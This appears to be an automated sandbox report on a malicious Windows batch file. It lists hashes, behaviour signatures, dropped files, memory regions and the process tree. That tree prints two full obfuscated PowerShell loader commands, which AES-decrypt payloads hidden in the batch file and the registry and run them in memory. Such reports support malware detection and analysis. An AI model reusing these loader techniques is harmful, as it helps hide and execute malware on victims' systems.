Analysis

  • max time kernel
    49s
  • max time network
    57s
  • platform
    windows10-1703_x64
  • resource
    win10-20230703-en
  • resource tags

    arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
  • submitted
    05/07/2023, 07:38

General

  • Target

    4ukpag0ymm.bat

  • Size

    12.7MB

  • MD5

    a6eb306f1a365c355e0db7cf5516019c

  • SHA1

    3825d2a7c41c8c8ed6d646741ad42343d94fa5de

  • SHA256

    4e1e20c34301d329fb9f36d346464ef839dc9619646c5f3c26d7510e9ca51811

  • SHA512

    2ea9ffdfed9bad624e235022b011fb76bb4270c73a564ce11e130b6005cfa63b93b7d9c9931afebc213bf4ad20e493d0405a457e3a58aa84bdd5a646596d0412

  • SSDEEP

    49152:+FgeGtxeM/etcJW4EQsw9n/udfp1V7HlAQ5uYv0JIloBhA20R0VEflHvfrM2+nxn:T

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Program crash 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:580
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{97698bb9-97d9-4c35-95f2-92bcc1889191}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4ukpag0ymm.bat"
      1⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:3688
      • C:\Windows\system32\net.exe
        net session
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4240
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          3⤵
            PID:4500
        • C:\Users\Admin\AppData\Local\Temp\4ukpag0ymm.bat.exe
          "4ukpag0ymm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function xKuue($cvXZS){ $uAvyf=[System.Security.Cryptography.Aes]::Create(); $uAvyf.Mode=[System.Security.Cryptography.CipherMode]::CBC; $uAvyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $uAvyf.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BCNQP2V2g5QVJ+KYVXfbsOlqSGQcI7crsDEaoGOxGzg='); $uAvyf.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8ezLrKD7ICNHucbi81JBAw=='); $LsnFR=$uAvyf.CreateDecryptor(); $return_var=$LsnFR.TransformFinalBlock($cvXZS, 0, $cvXZS.Length); $LsnFR.Dispose(); $uAvyf.Dispose(); $return_var;}function TNAcr($cvXZS){ $BWAiv=New-Object System.IO.MemoryStream(,$cvXZS); $nGKHJ=New-Object System.IO.MemoryStream; $QAMUv=New-Object System.IO.Compression.GZipStream($BWAiv, [IO.Compression.CompressionMode]::Decompress); $QAMUv.CopyTo($nGKHJ); $QAMUv.Dispose(); $BWAiv.Dispose(); $nGKHJ.Dispose(); $nGKHJ.ToArray();}function Zcsld($cvXZS,$XETSX){ $OMpUu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$cvXZS); $OBqgH=$OMpUu.EntryPoint; $OBqgH.Invoke($null, $XETSX);}$CQwfD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\4ukpag0ymm.bat').Split([Environment]::NewLine);foreach ($LuQZM in $CQwfD) { if ($LuQZM.StartsWith(':: ')) { $pRzKy=$LuQZM.Substring(4); break; }}$ZGtBs=[string[]]$pRzKy.Split('\');$RIKPL=TNAcr (xKuue ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZGtBs[0])));$mHTWH=TNAcr (xKuue ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZGtBs[1])));Zcsld $mHTWH (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Zcsld $RIKPL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2772
          • C:\Windows\$sxr-powershell.exe
            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function FeRTh($HXgng){ $yPrvu=[System.Security.Cryptography.Aes]::Create(); $yPrvu.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yPrvu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yPrvu.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74='); $yPrvu.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ=='); $ozdvl=$yPrvu.('rotpyrceDetaerC'[-1..-15] -join '')(); $QqwZx=$ozdvl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HXgng, 0, $HXgng.Length); $ozdvl.Dispose(); $yPrvu.Dispose(); $QqwZx;}function WViRv($HXgng){ $YGBzm=New-Object System.IO.MemoryStream(,$HXgng); $jYIbD=New-Object System.IO.MemoryStream; $xcmrz=New-Object System.IO.Compression.GZipStream($YGBzm, [IO.Compression.CompressionMode]::Decompress); $xcmrz.CopyTo($jYIbD); $xcmrz.Dispose(); $YGBzm.Dispose(); $jYIbD.Dispose(); $jYIbD.ToArray();}function rVIYY($HXgng,$jMUqG){ $jddfa=[System.Reflection.Assembly]::Load([byte[]]$HXgng); $YsjKF=$jddfa.EntryPoint; $YsjKF.Invoke($null, $jMUqG);}$yPrvu1 = New-Object System.Security.Cryptography.AesManaged;$yPrvu1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yPrvu1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yPrvu1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74=');$yPrvu1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ==');$fpmZa = $yPrvu1.('rotpyrceDetaerC'[-1..-15] -join '')();$JyAEw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Lp2kWRB1AxxhQQxT2T/myw==');$JyAEw = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw, 0, $JyAEw.Length);$JyAEw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw);$zICHN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jn4NRQnkXYsl32Is+gg282WYBV0gagQ8MS1zRX22bgg=');$zICHN = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zICHN, 0, $zICHN.Length);$zICHN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zICHN);$PwBzY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('J4DBSZhy9WFLrb/1V51eyg==');$PwBzY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PwBzY, 0, $PwBzY.Length);$PwBzY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PwBzY);$ViPXZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Mngehtp8iodkWphbkv4O6bqqvVMYeaUBYE2GJl50V6etuzFjoRRuotg5XiU3e8WmsmDhGnw89pJBVUBHjU4i1es/B2PmJyRQwK1PIIN6gbzxSX5wjB01VBkOTsDBG3G3UcM/hppjRUNTLA1Yxd1AHEb4Yg6evSxTpdx06BQYZsZdV1dEf4tfvt7VVllQi9Ye+b84zgPgj5/9EC7+lW3dOZyDrDUYEdlfFh9qkhA5/VwBMXwF9RMLl34/Yj7CnGrZxmiSr4VBkntou0+LpYwWiwO4PwsrVjQ/k7UmOrsZPblLazM18OrudS00RE6eNn7jY8cmwFaY/nTaeA+ccauwSD5IwDbYac+o3a6AAs/W5I/FMXGX2kHwDmSuJKxyRl/K+WxJzYOOrZ2BVa3+r6iGP2RTsQJlEl0jhfHlfyaW/Mc=');$ViPXZ = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ViPXZ, 0, $ViPXZ.Length);$ViPXZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ViPXZ);$IYENY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K499VrtyV2xFPV/zXnv15g==');$IYENY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IYENY, 0, $IYENY.Length);$IYENY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IYENY);$kbSkm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sjAbZBmdzHyZ4gASywrfrA==');$kbSkm = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kbSkm, 0, $kbSkm.Length);$kbSkm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kbSkm);$syIIo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VKKOXMQZ/zV0G5qEGBUgfw==');$syIIo = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($syIIo, 0, $syIIo.Length);$syIIo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($syIIo);$rPSDY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ki2C3gbWjSZLPKsqQkfSdw==');$rPSDY = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rPSDY, 0, $rPSDY.Length);$rPSDY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rPSDY);$YuyAr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C4fL+c9eyB+9jofj2XzjbA==');$YuyAr = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YuyAr, 0, $YuyAr.Length);$YuyAr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YuyAr);$JyAEw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MoJGuhZjvPaJuNT5m/GgeA==');$JyAEw0 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw0, 0, $JyAEw0.Length);$JyAEw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw0);$JyAEw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SAtN3BN3JH39yxeA0GX4Mg==');$JyAEw1 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw1, 0, $JyAEw1.Length);$JyAEw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw1);$JyAEw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jyvbBdj3J2Z9oSuZbaacg==');$JyAEw2 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw2, 0, $JyAEw2.Length);$JyAEw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw2);$JyAEw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mL0ZKAT5Ow8D5SQlehR9KA==');$JyAEw3 = $fpmZa.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JyAEw3, 0, $JyAEw3.Length);$JyAEw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JyAEw3);$fpmZa.Dispose();$yPrvu1.Dispose();if (@(get-process -ea silentlycontinue $JyAEw3).count -gt 1) {exit};$vQtde = [Microsoft.Win32.Registry]::$rPSDY.$syIIo($JyAEw).$kbSkm($zICHN);$KezyP=[string[]]$vQtde.Split('\');$lFPvG=WViRv(FeRTh([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KezyP[1])));rVIYY $lFPvG (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$jYxZq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($KezyP[0]);$yPrvu = New-Object System.Security.Cryptography.AesManaged;$yPrvu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yPrvu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yPrvu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YZQo5sCuWT/2/ayDWj0AhgRrI5kyeyz2m+UUxE+Xu74=');$yPrvu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6GM0oWR8hpp9ZGIAhFoZQ==');$ozdvl = $yPrvu.('rotpyrceDetaerC'[-1..-15] -join '')();$jYxZq = $ozdvl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jYxZq, 0, $jYxZq.Length);$ozdvl.Dispose();$yPrvu.Dispose();$YGBzm = New-Object System.IO.MemoryStream(, $jYxZq);$jYIbD = New-Object System.IO.MemoryStream;$xcmrz = New-Object System.IO.Compression.GZipStream($YGBzm, [IO.Compression.CompressionMode]::$JyAEw1);$xcmrz.$YuyAr($jYIbD);$xcmrz.Dispose();$YGBzm.Dispose();$jYIbD.Dispose();$jYxZq = $jYIbD.ToArray();$LWzZt = $ViPXZ | IEX;$jddfa = $LWzZt::$JyAEw2($jYxZq);$YsjKF = $jddfa.EntryPoint;$YsjKF.$JyAEw0($null, (, [string[]] ($PwBzY)))
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1500
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 1500 -s 1904
              4⤵
              • Program crash
              PID:2108

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\4ukpag0ymm.bat.exe

              Filesize

              435KB

              MD5

              f7722b62b4014e0c50adfa9d60cafa1c

              SHA1

              f31c17e0453f27be85730e316840f11522ddec3e

              SHA256

              ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

              SHA512

              7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

            • C:\Users\Admin\AppData\Local\Temp\4ukpag0ymm.bat.exe

              Filesize

              435KB

              MD5

              f7722b62b4014e0c50adfa9d60cafa1c

              SHA1

              f31c17e0453f27be85730e316840f11522ddec3e

              SHA256

              ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

              SHA512

              7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xggc5sul.vge.ps1

              Filesize

              1B

              MD5

              c4ca4238a0b923820dcc509a6f75849b

              SHA1

              356a192b7913b04c54574d18c28d46e6395428ab

              SHA256

              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

              SHA512

              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

            • C:\Windows\$sxr-powershell.exe

              Filesize

              435KB

              MD5

              f7722b62b4014e0c50adfa9d60cafa1c

              SHA1

              f31c17e0453f27be85730e316840f11522ddec3e

              SHA256

              ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

              SHA512

              7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

            • C:\Windows\$sxr-powershell.exe

              Filesize

              435KB

              MD5

              f7722b62b4014e0c50adfa9d60cafa1c

              SHA1

              f31c17e0453f27be85730e316840f11522ddec3e

              SHA256

              ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

              SHA512

              7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

            • memory/1500-245-0x00007FF855620000-0x00007FF8556CE000-memory.dmp

              Filesize

              696KB

            • memory/1500-244-0x00007FF857310000-0x00007FF8574EB000-memory.dmp

              Filesize

              1.9MB

            • memory/1500-248-0x0000014378520000-0x0000014378530000-memory.dmp

              Filesize

              64KB

            • memory/1500-235-0x0000014378520000-0x0000014378530000-memory.dmp

              Filesize

              64KB

            • memory/1500-234-0x0000014378520000-0x0000014378530000-memory.dmp

              Filesize

              64KB

            • memory/1500-249-0x0000014378520000-0x0000014378530000-memory.dmp

              Filesize

              64KB

            • memory/1500-250-0x0000014378520000-0x0000014378530000-memory.dmp

              Filesize

              64KB

            • memory/1500-251-0x0000014378520000-0x0000014378530000-memory.dmp

              Filesize

              64KB

            • memory/1952-183-0x0000000140000000-0x0000000140004000-memory.dmp

              Filesize

              16KB

            • memory/1952-185-0x0000000140000000-0x0000000140004000-memory.dmp

              Filesize

              16KB

            • memory/2772-154-0x00007FF857310000-0x00007FF8574EB000-memory.dmp

              Filesize

              1.9MB

            • memory/2772-157-0x000001B3FDD70000-0x000001B3FDD80000-memory.dmp

              Filesize

              64KB

            • memory/2772-177-0x000001B399920000-0x000001B399978000-memory.dmp

              Filesize

              352KB

            • memory/2772-178-0x000001B399990000-0x000001B39999C000-memory.dmp

              Filesize

              48KB

            • memory/2772-181-0x00007FF857310000-0x00007FF8574EB000-memory.dmp

              Filesize

              1.9MB

            • memory/2772-161-0x000001B399390000-0x000001B39967A000-memory.dmp

              Filesize

              2.9MB

            • memory/2772-159-0x000001B3982E0000-0x000001B399386000-memory.dmp

              Filesize

              16.6MB

            • memory/2772-158-0x000001B3FDD70000-0x000001B3FDD80000-memory.dmp

              Filesize

              64KB

            • memory/2772-156-0x000001B3FDD70000-0x000001B3FDD80000-memory.dmp

              Filesize

              64KB

            • memory/2772-176-0x000001B399680000-0x000001B399918000-memory.dmp

              Filesize

              2.6MB

            • memory/2772-155-0x00007FF855620000-0x00007FF8556CE000-memory.dmp

              Filesize

              696KB

            • memory/2772-151-0x000001B398000000-0x000001B39802C000-memory.dmp

              Filesize

              176KB

            • memory/2772-146-0x000001B3FDD70000-0x000001B3FDD80000-memory.dmp

              Filesize

              64KB

            • memory/2772-135-0x000001B3FDE80000-0x000001B3FDEF6000-memory.dmp

              Filesize

              472KB

            • memory/2772-133-0x000001B3FDD70000-0x000001B3FDD80000-memory.dmp

              Filesize

              64KB

            • memory/2772-131-0x000001B3FDD70000-0x000001B3FDD80000-memory.dmp

              Filesize

              64KB

            • memory/2772-128-0x000001B3FDCB0000-0x000001B3FDCD2000-memory.dmp

              Filesize

              136KB